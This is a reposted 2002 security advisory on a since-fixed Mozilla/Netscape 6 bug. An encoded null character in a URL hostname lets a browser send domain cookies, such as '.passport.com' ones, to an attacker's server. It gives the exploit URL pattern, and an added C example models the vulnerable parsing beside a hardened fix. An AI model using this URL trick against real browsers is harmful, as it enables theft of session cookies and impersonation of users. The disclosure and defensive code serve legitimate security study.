Mozilla Cookie Exploit

    Date: 22 Jan 2002
    Posted by: Anthony Pell
    A while ago I discovered a bug in Mozilla that lets you steal cookies for any domain by convincing the browser to load a specially formatted URL; I have been too busy to get around to making the details known earlier, so here they are. This is similar to holes that have been found, both by myself and by others, previously in IE.
Date: Mon, 21 Jan 2002 21:10:37 -0800 (PST)
From: Marc Slemko
To: [address obscured by the site]
Subject: Mozilla Cookie Exploit

A while ago I discovered a bug in Mozilla that lets you steal cookies for any domain by convincing the browser to load a specially formatted URL; I have been too busy to get around to making the details known earlier, so here they are. This is similar to holes that have been found, both by myself and by others, previously in IE.

Details are available at http://alive.znep.com/~marcs/security/mozillacookie/ and are also included below.

Update to Netscape 6.2.1 or Mozilla 0.9.7 for a fix.

Using open source products doesn't magically make you invulnerable to security problems like those that plague Microsoft.

Mozilla Cookie Exploit
Marc Slemko
Last Modified: $Date: 2002/01/22 05:06:04 $
$Revision: 1.6 $

Table of Contents
    [1] Executive Summary
    [2] What's New
    [3] Background
    [4] Details
    [5] Example Exploit

Executive Summary

Cookies are often used to identify and authenticate users to a website. If an attacker can steal a user's cookies, then they can impersonate that user. The completeness of the impersonation and the actions the attacker can perform as that user depend on how the particular site uses the cookies.

This bug in Mozilla allows an attacker who can convince the user's browser to load a given URL to steal their cookies for any given domain. It does not require that active scripting is enabled in the browser, and can be done with something as simple as an image tag, allowing for hassle-free use in HTML email, web-based email services, etc.

As expected, this bug is also present in Netscape 6.1. Upgrade to Netscape 6.2.1 or Mozilla 0.9.7 or higher, which fix this bug.

The take-away message is that, due to implementation bugs in browsers and in web applications, cookies can be stolen. It is critical that any application that depends on cookies does so with an understanding of this fact, and takes appropriate measures to limit the damage that can be done using stolen cookies.

What's New

  * Current Status Summary (last updated Mon Jan 21 20:48:17 PST 2002): I finally got around to making this vulnerability public.
  * mid-Jan 2002: Netscape put up a [6]note on their site saying that there was a security hole that they fixed.
  * Sometime between when I reported this bug to Netscape and when I made it public: This bug was fixed with the release of Netscape 6.2.1 and Mozilla 0.9.7.
  * November 15, 2001: I reported this bug to Netscape via their security bug submission form. I had trouble finding a documented method for submitting security bugs to mozilla.org, but eventually figured out that [address obscured by the site] existed. In any case, both submissions found their way to the same contact at Netscape.

Background

Cookies are the mechanism used by most websites to identify and authenticate a user. If you can steal someone's cookies, you can trick the server into thinking you are them. Exactly what this gains you depends on the application and how it is designed. It may gain you very little, or it may gain you a whole lot (eg. [7]Microsoft Passport to Trouble). For more information about cookies, see [8]The Unofficial Cookie FAQ.

Cookies are set with a specific hostname or a domain, so that they are only sent to that host or domain, with an exception or two that I won't go into here. They can also be set with a specific path, or with the secure flag, which means they will only be sent if the connection is an SSL connection. Normally, this should mean that only the server that set the cookie, or others it is operating in cooperation with (eg. in the same domain), can read it.

Mozilla has a bug that lets you bypass this protection and steal cookies for any domain. This is quite similar to bugs found in Microsoft Internet Explorer in the past, such as [9]this one and [10]this one. As has been shown time and time again, there are many security flaws in many Microsoft products. Sadly, they are far from being alone. There is almost certainly no web browser out there that is functional enough to browse a significant percent of current popular websites and that does not have similar security holes.

Details

The details are very trivial. Loading a URL such as:

    http://alive.znep.com%00www.passport.com/cgi-bin/cookies

...will cause Mozilla to connect to the hostname specified before the "%00", but send the cookies to the server based on the entire hostname. The "%00" is the URL-encoded version of the null character, used in C to terminate strings: the code that opens the connection stops reading the hostname at the null, while the cookie code matches against the whole string, which ends in "www.passport.com".

This exploit can be used to steal cookies with a specific path set, and can be used to steal cookies with the secure flag set, by using the specific path and SSL in the request URL. Note, however, that cookies set for a specific hostname (eg. "www.passport.com") can not be stolen using this method, but only cookies set for an entire domain (eg. ".passport.com"): a domain cookie is sent to any hostname ending in that domain, and the full string does end in ".passport.com", whereas a host cookie requires the hostname to match exactly, which it does not.

This bug was first tested on Netscape 6.1 on Windows 2000 and Mozilla 0.9.5 build 2001111503 and 0.9.5 build 20011012 on Linux. It is expected that all Netscape 6.x and Mozilla versions prior to the recently released fixed versions are vulnerable.

Example Exploit

An example exploit [11]is available. Very straightforward.
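The hostname mismatch described in the Details section, modelled as an added C example that is not part of the advisory and is not Mozilla's code: a simplified browser-side model in which the connection code takes the percent-decoded host as a C string (so it stops at the embedded null) while the cookie code compares the cookie scope against the full decoded byte length, beside a hardened variant that canonicalises the host once and rejects a decoded null or any non-hostname byte. The URL shape (scheme://host/path with no port or userinfo), the cookie scope rule (a leading dot means suffix match, otherwise exact match), and the function names are assumptions of this example; how Mozilla actually fixed the bug is not stated on the page.

```c
/* Added example: simplified model of the "%00 in hostname" cookie bug and
 * a hardened variant. Not Mozilla's code. Assumes scheme://host/path URLs
 * with no port or userinfo, and a cookie scope that is either a host name
 * ("www.passport.com", exact match) or a domain (".passport.com", suffix). */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum verdict { REJECT_URL = -1, NO_COOKIE = 0, SEND_COOKIE = 1 };

/* Copy the raw, still percent-encoded host part of url into host. */
static bool extract_raw_host(const char *url, char *host, size_t n)
{
    const char *p = strstr(url, "://");
    if (p == NULL)
        return false;
    p += 3;
    const char *end = strchr(p, '/');
    size_t len = end ? (size_t)(end - p) : strlen(p);
    if (len + 1 > n)
        return false;
    memcpy(host, p, len);
    host[len] = '\0';
    return true;
}

/* Percent-decode src into dst. Returns the number of bytes produced, which
 * exceeds strlen(dst) whenever the input contained "%00". */
static size_t url_decode(const char *src, char *dst, size_t n)
{
    size_t w = 0;
    for (size_t i = 0; src[i] != '\0' && w + 1 < n; i++) {
        if (src[i] == '%' && isxdigit((unsigned char)src[i + 1]) &&
            isxdigit((unsigned char)src[i + 2])) {
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            dst[w++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else {
            dst[w++] = src[i];
        }
    }
    dst[w] = '\0';
    return w;
}

/* Cookie scope check over an explicit byte length, so an embedded NUL does
 * not stop the comparison. This is the property the exploit relies on. */
static bool cookie_applies(const char *host, size_t host_len, const char *scope)
{
    size_t slen = strlen(scope);
    if (scope[0] == '.') {                  /* domain cookie: suffix match */
        if (slen > host_len)
            return false;
        host += host_len - slen;
        host_len = slen;
    } else if (host_len != slen) {          /* host cookie: exact match */
        return false;
    }
    for (size_t i = 0; i < host_len; i++)
        if (tolower((unsigned char)host[i]) != tolower((unsigned char)scope[i]))
            return false;
    return true;
}

/* Vulnerable behaviour: the connection code sees a C string ending at the
 * NUL, the cookie code sees the whole decoded buffer. */
enum verdict vulnerable_request(const char *url, const char *scope,
                                char *connect_host, size_t n)
{
    char raw[256], decoded[256];
    if (!extract_raw_host(url, raw, sizeof raw))
        return REJECT_URL;
    size_t len = url_decode(raw, decoded, sizeof decoded);
    snprintf(connect_host, n, "%s", decoded);       /* truncates at the NUL */
    return cookie_applies(decoded, len, scope) ? SEND_COOKIE : NO_COOKIE;
}

/* Hardened behaviour: one canonical host string for both uses, and any
 * decoded NUL or non-hostname byte rejects the URL outright. */
enum verdict hardened_request(const char *url, const char *scope,
                              char *connect_host, size_t n)
{
    char raw[256], decoded[256];
    if (!extract_raw_host(url, raw, sizeof raw))
        return REJECT_URL;
    size_t len = url_decode(raw, decoded, sizeof decoded);
    if (len == 0 || len != strlen(decoded))         /* embedded NUL */
        return REJECT_URL;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)decoded[i];
        if (!isalnum(c) && c != '.' && c != '-')
            return REJECT_URL;
    }
    snprintf(connect_host, n, "%s", decoded);
    return cookie_applies(decoded, len, scope) ? SEND_COOKIE : NO_COOKIE;
}

int main(void)
{
    const char *url = "http://alive.znep.com%00www.passport.com/cgi-bin/cookies";
    char host[256];
    enum verdict v = vulnerable_request(url, ".passport.com", host, sizeof host);
    printf("vulnerable: connects to %s, sends .passport.com cookie: %s\n",
           host, v == SEND_COOKIE ? "yes" : "no");
    v = hardened_request(url, ".passport.com", host, sizeof host);
    printf("hardened: %s\n", v == REJECT_URL ? "URL rejected" : "URL accepted");
    return 0;
}
```

Run as-is, the vulnerable path connects to alive.znep.com while attaching the .passport.com cookie, and a host-scoped www.passport.com cookie is not attached, matching the advisory's note that only domain cookies are exposed; the hardened path rejects the URL because the decoded host is shorter than its byte length.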
_________________________________________________________________

$Id: index.html,v 1.6 2002/01/22 05:06:04 marcs Exp marcs $

_________________________________________________________________

References

    1. http://alive.znep.com/~marcs/security/mozillacookie/#executivesummary
    2. http://alive.znep.com/~marcs/security/mozillacookie/#history
    3. http://alive.znep.com/~marcs/security/mozillacookie/#background
    4. http://alive.znep.com/~marcs/security/mozillacookie/#details
    5. http://alive.znep.com/~marcs/security/mozillacookie/#example
    6. http://home.netscape.com/security/
    7. http://alive.znep.com/~marcs/passport/
    8. http://www.cookiecentral.com/faq/
    9. http://alive.znep.com/~marcs/security/iecookie1/
   10. http://alive.znep.com/~marcs/security/iecookie2/
   11. http://alive.znep.com/~marcs/security/mozillacookie/demo.html